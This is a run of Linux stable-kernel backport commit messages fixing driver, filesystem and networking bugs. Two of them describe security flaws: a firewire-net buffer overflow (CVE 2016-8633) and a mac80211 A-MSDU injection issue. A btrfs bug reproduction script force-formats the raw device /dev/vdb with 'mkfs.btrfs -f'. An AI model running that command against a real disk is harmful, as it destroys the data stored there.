Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Cc: Daniel Borkmann <daniel@iogearbox.net>
Cc: Pravin Shelar <pshelar@ovn.org>
Cc: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 63d75463c9 ]
The commit 879c7220e8 ("net: pktgen: Observe needed_headroom
of the device") increased the 'pkt_overhead' field value by
LL_RESERVED_SPACE.
As a side effect the generated packet size, computed as:
/* Eth + IPh + UDPh + mpls */
datalen = pkt_dev->cur_pkt_size - 14 - 20 - 8 -
pkt_dev->pkt_overhead;
is decreased by the same value.
The above changed slightly the behavior of existing pktgen users,
and made the procfs interface somewhat inconsistent.
Fix it by restoring the previous pkt_overhead value and using
LL_RESERVED_SPACE as extralen in skb allocation.
Also, change pktgen_alloc_skb() to only partially reserve
the headroom to allow the caller to prefetch from ll header
start.
v1 -> v2:
- fixed some typos in the comments
Fixes: 879c7220e8 ("net: pktgen: Observe needed_headroom of the device")
Suggested-by: Ben Greear <greearb@candelatech.com>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit b82d44d784 ]
If the mac address origin is not dt, you can only safely assign a mac
address after "link up" of the device. If the link is off the clocks are
disabled and because of issues assigning registers when clocks are off the
new mac address cannot be written in .ndo_set_mac_address() on some soc's.
This fix sets the mac address unconditionally in fec_restart(...) and
ensures consistency between fec registers and the network layer.
Signed-off-by: Gavin Schenk <g.schenk@eckelmann.de>
Acked-by: Fugang Duan <fugang.duan@nxp.com>
Acked-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
Fixes: 9638d19e48 ("net: fec: add netif status check before set mac address")
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cf0ea4da4c upstream.
Like many similar devices it needs a quirk to work.
Issuing the request gets the device into an irrecoverable state.
Signed-off-by: Oliver Neukum <oneukum@suse.com>
Signed-off-by: Jiri Kosina <jkosina@suse.cz>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a6c6ead141 upstream.
After commit a4675fbc4a (cpufreq: intel_pstate: Replace timers with
utilization update callbacks) the cpufreq governor callbacks may not
be invoked on NOHZ_FULL CPUs and, in particular, switching to the
"performance" policy via sysfs may not have any effect on them. That
is a problem, because it usually is desirable to squeeze the last
bit of performance out of those CPUs, so work around it by setting
the maximum P-state (within the limits) in intel_pstate_set_policy()
upfront when the policy is CPUFREQ_POLICY_PERFORMANCE.
Fixes: a4675fbc4a (cpufreq: intel_pstate: Replace timers with utilization update callbacks)
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Acked-by: Srinivas Pandruvada <srinivas.pandruvada@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 40b6e61ac7 upstream.
Commit e96a8a3bb6 ("UBI: Fastmap: Do not add vol if it already
exists") introduced a bug by changing the possible error codes returned
by add_vol():
- this function no longer returns NULL in case of allocation failure
but return ERR_PTR(-ENOMEM)
- when a duplicate entry in the volume RB tree is found it returns
ERR_PTR(-EEXIST) instead of ERR_PTR(-EINVAL)
Fix the tests done on add_vol() return val to match this new behavior.
Fixes: e96a8a3bb6 ("UBI: Fastmap: Do not add vol if it already exists")
Reported-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Boris Brezillon <boris.brezillon@free-electrons.com>
Acked-by: Sheng Yong <shengyong1@huawei.com>
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0b34c261e2 upstream.
While free'ing qgroup->reserved resources, we much check if
the page has not been invalidated by a truncate operation
by checking if the page is still dirty before reducing the
qgroup resources. Resources in such a case are free'd when
the entire extent is released by delayed_ref.
This fixes a double accounting while releasing resources
in case of truncating a file, reproduced by the following testcase.
SCRATCH_DEV=/dev/vdb
SCRATCH_MNT=/mnt
mkfs.btrfs -f $SCRATCH_DEV
mount -t btrfs $SCRATCH_DEV $SCRATCH_MNT
cd $SCRATCH_MNT
btrfs quota enable $SCRATCH_MNT
btrfs subvolume create a
btrfs qgroup limit 500m a $SCRATCH_MNT
sync
for c in {1..15}; do
dd if=/dev/zero bs=1M count=40 of=$SCRATCH_MNT/a/file;
done
sleep 10
sync
sleep 5
touch $SCRATCH_MNT/a/newfile
echo "Removing file"
rm $SCRATCH_MNT/a/file
Fixes: b9d0b38928 ("btrfs: Add handler for invalidate page")
Signed-off-by: Goldwyn Rodrigues <rgoldwyn@suse.com>
Reviewed-by: Qu Wenruo <quwenruo@cn.fujitsu.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 42acfc6615 upstream.
In csi_J(3), the third parameter of scr_memsetw (vc_screenbuf_size) is
divided by 2 inappropriatelly. But scr_memsetw expects size, not
count, because it divides the size by 2 on its own before doing actual
memset-by-words.
So remove the bogus division.
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Cc: Petr Písař <ppisar@redhat.com>
Fixes: f8df13e0a9 (tty: Clean console safely)
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e4e70a147a upstream.
Pipelines can only be run if all their video nodes are streaming. Commit
b4dfb9b35a ("[media] v4l: vsp1: Stop the pipeline upon the first
STREAMOFF") fixed the pipeline stop sequence, but introduced a race
condition that makes it possible to run a pipeline after stopping the
stream on a video node by queuing a buffer on the other side of the
pipeline.
Fix this by clearing the buffers ready flag when stopping the stream,
which will prevent the QBUF handler from running the pipeline.
Fixes: b4dfb9b35a ("[media] v4l: vsp1: Stop the pipeline upon the first STREAMOFF")
Reported-by: Kieran Bingham <kieran@bingham.xyz>
Tested-by: Kieran Bingham <kieran@bingham.xyz>
Signed-off-by: Laurent Pinchart <laurent.pinchart+renesas@ideasonboard.com>
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d8e5f0eca1 upstream.
If we configure musb with 2430 glue as a peripheral, and then rmmod
omap2430 module, we'll get the following error:
[ INFO: HARDIRQ-safe -> HARDIRQ-unsafe lock order detected ]
...
rmmod/413 [HC0[0]:SC0[0]:HE0:SE1] is trying to acquire:
(&phy->mutex){+.+.+.}, at: [<c04b9fd0>] phy_power_off+0x1c/0xb8
[ 204.678710]
and this task is already holding:
(&(&musb->lock)->rlock){-.-...}, at: [<bf3a482c>]
musb_gadget_stop+0x24/0xec [musb_hdrc]
which would create a new lock dependency:
(&(&musb->lock)->rlock){-.-...} -> (&phy->mutex){+.+.+.}
...
This is because some glue layers expect musb_platform_enable/disable
to be called with spinlock held, and 2430 glue layer has USB PHY on
the I2C bus using a mutex.
We could fix the glue layers to take the spinlock, but we still have
a problem of musb_plaform_enable/disable being called in an unbalanced
manner. So that would still lead into USB PHY enable/disable related
problems for omap2430 glue layer.
While it makes sense to only enable USB PHY when needed from PM point
of view, in this case we just can't do it yet without breaking things.
So let's just revert phy_enable/disable related changes instead and
reconsider this after we have fixed musb_platform_enable/disable to
be balanced.
Fixes: a83e17d0f7 ("usb: musb: Improve PM runtime and phy handling for 2430 glue layer")
Reviewed-by: Laurent Pinchart <laurent.pinchart@ideasonboard.com>
Signed-off-by: Tony Lindgren <tony@atomide.com>
Signed-off-by: Bin Liu <b-liu@ti.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 991d5add50 upstream.
After commit b09b5224fe ("usb: chipidea: implement platform shutdown
callback") and commit 43a404577a ("usb: chipidea: host: set host to
be null after hcd is freed") a NULL pointer dereference is caused
on i.MX23 during shutdown. So ensure that role is set to CI_ROLE_END and
we finish interrupt handling before the hcd is deallocated. This avoids
the NULL pointer dereference.
Suggested-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Stefan Wahren <stefan.wahren@i2se.com>
Fixes: b09b5224fe ("usb: chipidea: implement platform shutdown callback")
Signed-off-by: Peter Chen <peter.chen@nxp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 51fbc7c06c upstream.
In commit 2abd9d5fa6 ("usb: dwc3: ep0: Add chained TRB support"), the
size of the memory allocated with 'dma_alloc_coherent()' has been modified
but the corresponding calls to 'dma_free_coherent()' have not been updated
accordingly.
This has been spotted with coccinelle, using the following script:
////////////////////
@r@
expression x0, x1, y0, y1, z0, z1, t0, t1, ret;
@@
* ret = dma_alloc_coherent(x0, y0, z0, t0);
...
* dma_free_coherent(x1, y1, ret, t1);
@script:python@
y0 << r.y0;
y1 << r.y1;
@@
if y1.find(y0) == -1:
print "WARNING: sizes look different: '%s' vs '%s'" % (y0, y1)
////////////////////
Fixes: 2abd9d5fa6 ("usb: dwc3: ep0: Add chained TRB support")
Signed-off-by: Christophe JAILLET <christophe.jaillet@wanadoo.fr>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0733424c9b upstream.
Exported pwm channels aren't removed before the pwmchip and are
leaked. This results in invalid sysfs files. This fix removes
all exported pwm channels before chip removal.
Signed-off-by: David Hsu <davidhsu@google.com>
Fixes: 76abbdde2d ("pwm: Add sysfs interface")
Signed-off-by: Thierry Reding <thierry.reding@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e0299908d6 upstream.
If we "goto out;" then it calls display_timings_release(timings);
Since "timings" is NULL, that's going to oops. Just return directly.
Fixes: 420a488278 ('video: fbdev: pxafb: initial devicetree conversion')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Acked-by: Robert Jarzmik <robert.jarzmik@free.fr>
Signed-off-by: Tomi Valkeinen <tomi.valkeinen@ti.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ecbfa8eaba upstream.
scan_pool() does not mark the PEB for scrubing when bitflips are
detected in the EC header of a free PEB (VID header region left to
0xff).
Make sure we scrub the PEB in this case.
Signed-off-by: Boris Brezillon <boris.brezillon@free-electrons.com>
Fixes: dbb7d2a88d ("UBI: Add fastmap core")
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6d19375b58 upstream.
Justin and Chris spotted that iptables NFLOG target was broken when they
upgraded the kernel to 4.8: "ulogd-2.0.5- IPs are no longer logged" or
"results in segfaults in ulogd-2.0.5".
Because "struct nf_loginfo li;" is a local variable, and flags will be
filled with garbage value, not inited to zero. So if it contains 0x1,
packets will not be logged to the userspace anymore.
Fixes: 7643507fe8 ("netfilter: xt_NFLOG: nflog-range does not truncate packets")
Reported-by: Justin Piszcz <jpiszcz@lucidpixels.com>
Reported-by: Chris Caputo <ccaputo@alt.net>
Tested-by: Chris Caputo <ccaputo@alt.net>
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6a676fb69d upstream.
Instantiated I2C device nodes are marked with OF_POPULATE. This was
introduced in 4f001fd301. On unloading, loaded device nodes will of
course be unmarked. The problem are nodes that fail during
initialisation: If a node fails, it won't be unloaded and hence not be
unmarked.
If a I2C driver module is unloaded and reloaded, it will skip nodes that
failed before.
Skip device nodes that are already populated and mark them only in case
of success.
Fixes: 4f001fd301 ("i2c: Mark instantiated device nodes with OF_POPULATE")
Signed-off-by: Ralf Ramsauer <ralf@ramses-pyramidenbau.de>
Reviewed-by: Geert Uytterhoeven <geert+renesas@glider.be>
Acked-by: Pantelis Antoniou <pantelis.antoniou@konsulko.com>
[wsa: use 14-digit commit sha]
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e3b9e6e3a9 upstream.
Broadwell and newer actually compress up to 2560 lines instead of 2048
(as documented in the FBC_CTL page). If we don't take this into
consideration we end up reserving too little stolen memory for the
CFB, so we may allocate something else (such as a ring) right after
what we reserved, and the hardware will overwrite it with the contents
of the CFB when FBC is active, causing GPU hangs. Another possibility
is that the CFB may be allocated at the very end of the available
space, so the CFB will overlap the reserved stolen area, leading to
FIFO underruns.
This bug has always been a problem on BDW (the only affected platform
where FBC is enabled by default), but it's much easier to reproduce
since the following commit:
commit c58b735fc7
Author: Chris Wilson <chris@chris-wilson.co.uk>
Date: Thu Aug 18 17:16:57 2016 +0100
drm/i915: Allocate rings from stolen
Of course, you can only reproduce the bug if your screen is taller
than 2048 lines.
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=98213
Fixes: a98ee79317 ("drm/i915/fbc: enable FBC by default on HSW and BDW")
Signed-off-by: Paulo Zanoni <paulo.r.zanoni@intel.com>
Reviewed-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1477065346-13736-1-git-send-email-paulo.r.zanoni@intel.com
(cherry picked from commit 79f2624b1b)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 198c5ee3c6 upstream.
The VBT provides the platform a way to mix and match the DDI ports vs.
AUX channels. Currently we only trust the VBT for DDI E, which has no
corresponding AUX channel of its own. However it is possible that some
board might use some non-standard DDI vs. AUX port routing even for
the other ports. Perhaps for signal routing reasons or something,
So let's generalize this and trust the VBT for all ports.
For now we'll limit this to DDI platforms, as we trust the VBT a bit
more there anyway when it comes to the DDI ports. I've structured
the code in a way that would allow us to easily expand this to
other platforms as well, by simply filling in the ddi_port_info.
v2: Drop whitespace changes, keep MISSING_CASE() for unknown
aux ch assignment, include a commit message, include debug
message during init
Cc: Maarten Maathuis <madman2003@gmail.com>
Tested-by: Maarten Maathuis <madman2003@gmail.com>
References: https://bugs.freedesktop.org/show_bug.cgi?id=97877
Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1476208368-5710-2-git-send-email-ville.syrjala@linux.intel.com
Reviewed-by: Jim Bride <jim.bride@linux.intel.com>
(cherry picked from commit 8f7ce038f1)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a288960663 upstream.
The fbdev helper code keeps around two lists of connectors. One is the
list of all connectors it could use, and that list already holds
references for all the connectors. However the other list, or rather
lists, is the one actively being used. That list is tracked per-crtc
and currently doesn't hold any extra references. Let's grab those
extra references to avoid oopsing when the connector vanishes. The
list of all possible connectors should get updated when the hpd happens,
but the list of actively used connectors would not get updated until
the next time the fb-helper picks through the set of possible connectors.
And so we need to hang on to the connectors until that time.
Since we need to clean up in drm_fb_helper_crtc_free() as well,
let's pull the code to a common place. And while at it let's
pull in up the modeset->mode cleanup in there as well. The case
of modeset->fb is a bit less clear. I'm thinking we should probably
hold a reference to it, but for now I just slapped on a FIXME.
v2: Cleanup things drm_fb_helper_crtc_free() too (Chris)
v3: Don't leak modeset->connectors (Chris)
Cc: Chris Wilson <chris@chris-wilson.co.uk>
Cc: Carlos Santa <carlos.santa@intel.com>
Cc: Kirill A. Shutemov <kirill@shutemov.name>
Tested-by: Carlos Santa <carlos.santa@intel.com> (v1)
Tested-by: Kirill A. Shutemov <kirill@shutemov.name> (v1)
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=97666
Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
Signed-off-by: Daniel Vetter <daniel.vetter@ffwll.ch>
Link: http://patchwork.freedesktop.org/patch/msgid/1477492878-4990-1-git-send-email-ville.syrjala@linux.intel.com
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 87d3b6588f upstream.
Since 4.7 kernel, we've seen the error messages like
kernel: [TTM] Buffer eviction failed
kernel: qxl 0000:00:02.0: object_init failed for (4026540032, 0x00000001)
kernel: [drm:qxl_alloc_bo_reserved [qxl]] *ERROR* failed to allocate VRAM BO
on QXL when switching and accessing on VT. The culprit was the
generic deferred_io code (qxl driver switched to it since 4.7).
There is a race between the dirty clip update and the call of
callback.
In drm_fb_helper_dirty(), the dirty clip is updated in the spinlock,
while it kicks off the update worker outside the spinlock. Meanwhile
the update worker clears the dirty clip in the spinlock, too. Thus,
when drm_fb_helper_dirty() is called concurrently, schedule_work() is
called after the clip is cleared in the first worker call.
This patch addresses it by validating the clip before calling the
dirty fb callback.
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=98322
Bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1003298
Fixes: eaa434defa ('drm/fb-helper: Add fb_deferred_io support')
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Reviewed-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Signed-off-by: Daniel Vetter <daniel.vetter@ffwll.ch>
Link: http://patchwork.freedesktop.org/patch/msgid/20161020150530.5787-1-tiwai@suse.de
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b0a6af8b34 upstream.
Check whether the kernel really supports power resources for a device,
otherwise the power might not be removed when the device is runtime
suspended (DSM should still work in these cases where PR does not).
This is a workaround for a problem where ACPICA and Windows 10 differ in
behavior. ACPICA does not correctly enumerate power resources within a
conditional block (due to delayed execution of such blocks) and as a
result power_resources is set to false even if _PR3 exists.
Fixes: 692a17dcc2 ("drm/nouveau/acpi: fix lockup with PCIe runtime PM")
Link: https://bugs.freedesktop.org/show_bug.cgi?id=98398
Reported-and-tested-by: Rick Kerkhof <rick.2889@gmail.com>
Reviewed-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Peter Wu <peter@lekensteyn.nl>
Signed-off-by: Dave Airlie <airlied@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 537b4b462c upstream.
The read is taking a considerable amount of time (about 50us on this
machine). The register does not ever hold anything other than the ring
ID that is updated in this exact function, so there is no need for
the read modify write cycle.
This chops off a big chunk of the time spent in hardirq disabled
context, as this function is called multiple times in the interrupt
handler. With this change applied radeon won't show up in the list
of the worst IRQ latency offenders anymore, where it was a regular
before.
Reviewed-by: Christian König <christian.koenig@amd.com>
Signed-off-by: Lucas Stach <dev@lynxeye.de>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e73aca5184 upstream.
Before accessing the u/v offset(aka, u/vbo for IPUv3) of the old plane state's
relevant fb, we should make sure the fb is in YU12 or YV12 pixel format(which
are the two YUV pixel formats we support only), otherwise, we are likely to
trigger BUG_ON() in drm_plane_state_to_u/vbo() since the fb's pixel format is
probably not YU12 or YV12.
Link: https://bugs.freedesktop.org/show_bug.cgi?id=98150
Fixes: c6c1f9bc79 ("drm/imx: Add active plane reconfiguration support")
Signed-off-by: Liu Ying <gnuiyl@gmail.com>
Signed-off-by: Philipp Zabel <p.zabel@pengutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 43daa01323 upstream.
We added active plane reconfiguration support by forcing a full modeset
operation. So, looking at old_plane_state->fb to determine whether we need to
switch EBA buffer(for hardware double buffering) in ipu_plane_atomic_set_base()
or not is no more correct. Instead, we should do that only when we don't need
modeset, otherwise, we initialize the two EBA buffers with the buffer address.
Fixes: c6c1f9bc79 ("drm/imx: Add active plane reconfiguration support")
Signed-off-by: Liu Ying <gnuiyl@gmail.com>
Signed-off-by: Philipp Zabel <p.zabel@pengutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1217e1d199 upstream.
mddev->curr_resync usually records where the current resync is up to,
but during the starting phase it has some "magic" values.
1 - means that the array is trying to start a resync, but has yielded
to another array which shares physical devices, and also needs to
start a resync
2 - means the array is trying to start resync, but has found another
array which shares physical devices and has already started resync.
3 - means that resync has commensed, but it is possible that nothing
has actually been resynced yet.
It is important that this value not be visible to user-space and
particularly that it doesn't get written to the metadata, as the
resync or recovery checkpoint. In part, this is because it may be
slightly higher than the correct value, though this is very rare.
In part, because it is not a multiple of 4K, and some devices only
support 4K aligned accesses.
There are two places where this value is propagates into either
->curr_resync_completed or ->recovery_cp or ->recovery_offset.
These currently avoid the propagation of values 1 and 3, but will
allow 3 to leak through.
Change them to only propagate the value if it is > 3.
As this can cause an array to fail, the patch is suitable for -stable.
Reported-by: Viswesh <viswesh.vichu@gmail.com>
Signed-off-by: NeilBrown <neilb@suse.com>
Signed-off-by: Shaohua Li <shli@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 579ed34f7b upstream.
This is the counterpart of raid10 fix. If a write error occurs, raid10
will try to rewrite the bio in small chunk size. If the rewrite fails,
raid10 will record the error in bad block. narrow_write_error will
always use WRITE for the bio, but actually it could be a discard. Since
discard bio hasn't payload, write the bio will cause different issues.
But discard error isn't fatal, we can safely ignore it. This is what
this patch does.
This issue should exist since discard is added, but only exposed with
recent arbitrary bio size feature.
Cc: Sitsofe Wheeler <sitsofe@gmail.com>
Signed-off-by: Shaohua Li <shli@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e3f948cd32 upstream.
If a write error occurs, raid1 will try to rewrite the bio in small
chunk size. If the rewrite fails, raid1 will record the error in bad
block. narrow_write_error will always use WRITE for the bio, but
actually it could be a discard. Since discard bio hasn't payload, write
the bio will cause different issues. But discard error isn't fatal, we
can safely ignore it. This is what this patch does.
This issue should exist since discard is added, but only exposed with
recent arbitrary bio size feature.
Reported-and-tested-by: Sitsofe Wheeler <sitsofe@gmail.com>
Signed-off-by: Shaohua Li <shli@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2bf7dc8443 upstream.
The arcmsr driver failed to pass SYNCHRONIZE CACHE to controller
firmware. Depending on how drive caches are handled internally by
controller firmware this could potentially lead to data integrity
problems.
Ensure that cache flushes are passed to the controller.
[mkp: applied by hand and removed unused vars]
Signed-off-by: Ching Huang <ching2048@areca.com.tw>
Reported-by: Tomas Henzl <thenzl@redhat.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f67b107d4c upstream.
Commit 0b8e3c4ca2 ("ath10k: move cal data len to hw_params") broke retrieving
the calibration data from cal_data debugfs file. The length of file was always
zero. The reason is:
static ssize_t ath10k_debug_cal_data_read(struct file *file,
char __user *user_buf,
size_t count, loff_t *ppos)
{
struct ath10k *ar = file->private_data;
void *buf = file->private_data;
This is obviously bogus, private_data cannot contain both struct ath10k and the
buffer. Fix it by caching calibration data to ar->debug.cal_data. This also
allows it to be accessed when the device is not active (interface is down).
The cal_data buffer is fixed size because during the first firmware probe we
don't yet know what will be the lenght of the calibration data. It was simplest
just to use a fixed length. There's a WARN_ON() in
ath10k_debug_cal_data_fetch() if the buffer is too small.
Tested with qca988x and firmware 10.2.4.70.56.
Reported-by: Nikolay Martynov <mar.kolya@gmail.com>
Fixes: 0b8e3c4ca2 ("ath10k: move cal data len to hw_params")
Signed-off-by: Marty Faltesek <mfaltesek@google.com>
[kvalo@qca.qualcomm.com: improve commit log and minor other changes]
Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 304e5ac118 upstream.
This reverts commit 171f6402e4 ("ath9k_hw: implement temperature compensation
support for AR9003+"). Some users report that this commit causes a regression
in performance under some conditions.
Fixes: 171f6402e4 ("ath9k_hw: implement temperature compensation support for AR9003+")
Signed-off-by: Felix Fietkau <nbd@nbd.name>
[kvalo@qca.qualcomm.com: improve commit log]
Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ea720935cf upstream.
In mac80211, multicast A-MSDUs are accepted in many cases that
they shouldn't be accepted in:
* drop A-MSDUs with a multicast A1 (RA), as required by the
spec in 9.11 (802.11-2012 version)
* drop A-MSDUs with a 4-addr header, since the fourth address
can't actually be useful for them; unless 4-address frame
format is actually requested, even though the fourth address
is still not useful in this case, but ignored
Accepting the first case, in particular, is very problematic
since it allows anyone else with possession of a GTK to send
unicast frames encapsulated in a multicast A-MSDU, even when
the AP has client isolation enabled.
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e9300a4b7b upstream.
RFC 2734 defines the datagram_size field in fragment encapsulation
headers thus:
datagram_size: The encoded size of the entire IP datagram. The
value of datagram_size [...] SHALL be one less than the value of
Total Length in the datagram's IP header (see STD 5, RFC 791).
Accordingly, the eth1394 driver of Linux 2.6.36 and older set and got
this field with a -/+1 offset:
ether1394_tx() /* transmit */
ether1394_encapsulate_prep()
hdr->ff.dg_size = dg_size - 1;
ether1394_data_handler() /* receive */
if (hdr->common.lf == ETH1394_HDR_LF_FF)
dg_size = hdr->ff.dg_size + 1;
else
dg_size = hdr->sf.dg_size + 1;
Likewise, I observe OS X 10.4 and Windows XP Pro SP3 to transmit 1500
byte sized datagrams in fragments with datagram_size=1499 if link
fragmentation is required.
Only firewire-net sets and gets datagram_size without this offset. The
result is lacking interoperability of firewire-net with OS X, Windows
XP, and presumably Linux' eth1394. (I did not test with the latter.)
For example, FTP data transfers to a Linux firewire-net box with max_rec
smaller than the 1500 bytes MTU
- from OS X fail entirely,
- from Win XP start out with a bunch of fragmented datagrams which
time out, then continue with unfragmented datagrams because Win XP
temporarily reduces the MTU to 576 bytes.
So let's fix firewire-net's datagram_size accessors.
Note that firewire-net thereby loses interoperability with unpatched
firewire-net, but only if link fragmentation is employed. (This happens
with large broadcast datagrams, and with large datagrams on several
FireWire CardBus cards with smaller max_rec than equivalent PCI cards,
and it can be worked around by setting a small enough MTU.)
Signed-off-by: Stefan Richter <stefanr@s5r6.in-berlin.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 667121ace9 upstream.
The IP-over-1394 driver firewire-net lacked input validation when
handling incoming fragmented datagrams. A maliciously formed fragment
with a respectively large datagram_offset would cause a memcpy past the
datagram buffer.
So, drop any packets carrying a fragment with offset + length larger
than datagram_size.
In addition, ensure that
- GASP header, unfragmented encapsulation header, or fragment
encapsulation header actually exists before we access it,
- the encapsulated datagram or fragment is of nonzero size.
Reported-by: Eyal Itkin <eyal.itkin@gmail.com>
Reviewed-by: Eyal Itkin <eyal.itkin@gmail.com>
Fixes: CVE 2016-8633
Signed-off-by: Stefan Richter <stefanr@s5r6.in-berlin.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit da25311c7c upstream.
The Schenker XMG C504 is a rebranded Gigabyte P35 v2 laptop.
Therefore it also needs a keyboard reset to detect the Elantech touchpad.
Otherwise the touchpad appears to be dead.
With this patch the touchpad is detected:
$ dmesg | grep -E "(i8042|Elantech|elantech)"
[ 2.675399] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
[ 2.680372] i8042: Attempting to reset device connected to KBD port
[ 2.789037] serio: i8042 KBD port at 0x60,0x64 irq 1
[ 2.791586] serio: i8042 AUX port at 0x60,0x64 irq 12
[ 2.813840] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input4
[ 3.811431] psmouse serio1: elantech: assuming hardware version 4 (with firmware version 0x361f0e)
[ 3.825424] psmouse serio1: elantech: Synaptics capabilities query result 0x00, 0x15, 0x0f.
[ 3.839424] psmouse serio1: elantech: Elan sample query result 03, 58, 74
[ 3.911349] input: ETPS/2 Elantech Touchpad as /devices/platform/i8042/serio1/input/input6
Signed-off-by: Patrick Scheuring <patrick.scheuring.dev@gmail.com>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ab05e5ec81 upstream.
The generic disable_rf() function clears bits 22 and 23 in
REG_RX_WAIT_CCA, however we did not re-enable them again in
rtl8723b_enable_rf()
This resolves the problem for me with 8723bu devices not working again
after reloading the driver.
Signed-off-by: Jes Sorensen <Jes.Sorensen@redhat.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1e54134cca upstream.
A device running without RX package aggregation could return more data
in the USB packet than the actual network packet. In this case we
could would clone the skb but then determine that that there was no
packet to handle and exit without freeing the cloned skb first.
This has so far only been observed with 8188eu devices, but could
affect others.
Signed-off-by: Jes Sorensen <Jes.Sorensen@redhat.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b052b07c39 upstream.
dm-raid 1.9.0 fails to activate existing RAID4/10 devices that have the
old superblock format (which does not have takeover/reshaping support
that was added via commit 33e53f0685).
Fix validation path for old superblocks by reverting to the old raid4
layout and basing checks on mddev->new_{level,layout,...} members in
super_init_validation().
Signed-off-by: Heinz Mauelshagen <heinzm@redhat.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
